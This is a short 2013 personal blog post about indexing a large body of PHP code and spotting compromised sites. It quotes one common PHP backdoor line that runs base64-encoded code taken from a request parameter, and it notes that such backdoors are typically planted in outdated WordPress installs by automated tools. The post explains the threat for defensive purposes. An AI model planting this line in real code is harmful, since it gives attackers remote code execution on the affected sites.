Archives Dec. 1, 2013

Sunday, 1st December 2013 - 15:28:00

PHP Files Indexed

145,755,658 lines of PHP indexed for searching as part of a migration project I am contributing to. Once I get some spare time at work (hah!) I may use the data to try and detect some nasty code - eg some compromised sites and such.

The old classic code injection technique. When an attacker adds this to your PHP it's basically open slather for them to execute whatever code they POST or GET to c_id.

@eval(base64_decode($_REQUEST['c_id']));

I see this type of thing the most in wordpress installs. People don't keep wordpress (AND i'ts plugins / themes) up to date and then suffer the consequences - typically this sort of attack is not targetted, it's an automated tool which will probe wordpress installs for vunerabilities until it finds one it can comromise.